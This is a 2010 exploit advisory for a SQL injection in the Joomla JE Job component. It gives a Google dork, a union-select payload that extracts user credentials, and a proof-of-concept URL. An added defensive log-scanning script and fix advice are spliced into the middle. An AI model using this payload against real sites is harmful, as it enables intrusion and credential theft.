Joomla JE Job 1.0 SQL Injection

2010-05-28T00:00:00
ID PACKETSTORM:90067
Type packetstorm
Reporter v3n0m
Modified 2010-05-28T00:00:00

Description

-----------------------------------------------------------------------  
Joomla Component com_jejob 1.0 (catid) SQL Injection Vulnerability  
-----------------------------------------------------------------------  
Author : v3n0m  
Site : http://yogyacarderlink.web.id/  
Date : May, 29-2010  
Location : Jakarta, Indonesia  
Time Zone : GMT +7:00  
----------------------------------------------------------------  
  
Affected software description:  
~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Application : JE Job  
Vendor : http://joomlaextensions.co.in/  
License : GPLv2  
Version : 1.0 (lower versions may also be affected)  
Google Dork : inurl:com_jejob  
  
Users can search for jobs by location, job title, or experience. Users can   
also see the job categories on the front page, where jobs are displayed by category.  
----------------------------------------------------------------  
  
Exploitz:  
~~~~~~~  
-9999+union+all+select+1,group_concat(username,char(58),password)v3n0m,3,4,5+from+jos_users--  
  
  
SQLi p0c:  
~~~~~~~  
  
http://127.0.0.1/[path]/index.php?option=com_jejob&view=item&catid=[SQLi]  
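For defenders, a small log check for the pattern above: it parses Apache-style access-log lines, URL-decodes the query string, and flags any com_jejob request whose catid is not a plain integer (the same whitelist check the component should enforce server-side). This is an added example, not code from the advisory or the JE Job component; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the advisory). The third
# carries the advisory's kind of union payload in catid, the fourth a
# percent-encoded variant; the first two are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [29/May/2010:10:01:02 +0700] "GET /index.php?option=com_jejob&view=item&catid=7 HTTP/1.1" 200 5120
10.0.0.5 - - [29/May/2010:10:01:09 +0700] "GET /index.php?option=com_content&view=article&id=3 HTTP/1.1" 200 2211
10.0.0.9 - - [29/May/2010:10:02:33 +0700] "GET /index.php?option=com_jejob&view=item&catid=-9999+union+all+select+1,2,3,4,5-- HTTP/1.1" 200 7300
10.0.0.9 - - [29/May/2010:10:02:40 +0700] "GET /index.php?option=com_jejob&view=item&catid=%2D1%20or%201%3D1 HTTP/1.1" 200 7300
"""

# Common log format: ip ident user [timestamp] "METHOD target protocol" status size
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)
# catid is a category id, so anything but an optionally signed integer is suspect
INT_RE = re.compile(r'^-?\d+$')


def catid_finding(line):
    """Return (ip, decoded catid) when the line is a com_jejob request whose
    catid is not a plain integer; otherwise None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    # parse_qs turns '+' into spaces and decodes %xx escapes, so encoded
    # payloads are inspected in their decoded form
    qs = parse_qs(urlsplit(m['target']).query, keep_blank_values=True)
    if qs.get('option', [''])[0] != 'com_jejob':
        return None
    for catid in qs.get('catid', []):
        if not INT_RE.match(catid):
            return m['ip'], catid
    return None


def scan(log_text):
    """Run the check over every line and collect the findings."""
    return [f for f in (catid_finding(line) for line in log_text.splitlines()) if f]


if __name__ == '__main__':
    for ip, catid in scan(SAMPLE_LOG):
        print(f'{ip}: non-integer catid {catid!r}')
```

The same integer-only rule is the server-side fix: cast catid to an integer before it reaches the query (Joomla 1.5's JRequest::getInt does this) rather than interpolating the raw parameter.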
----------------------------------------------------------------  
  
Shoutz:  
~~~~  
  
- 'malingsial talks too much, you skill off bullshit on '  
- LeQhi,lingah,GheMaX,spykit,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-  
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag  
- kiddies,whitehat,mywisdom,yadoy666,udhit  
- c4uR (next time you vent, don't cry again, uR, bruakakaka)  
- BLaSTER & TurkGuvenligi & Agd_scorp (Turkey Hackers)  
- elicha cristia [ Mizz U so much... ]  
- Joss [at] hack0wn.com  
- #yogyacarderlink @irc.dal.net  
----------------------------------------------------------------  
Contact:  
~~~~  
  
v3n0m | YOGYACARDERLINK CREW | v3n0m666[at]live[live]com  
Homepage: http://yogyacarderlink.web.id/  
http://v3n0m.blogdetik.com/  
http://elich4.blogspot.com/ << update it, come on >_<  
  
---------------------------[EOF]--------------------------------  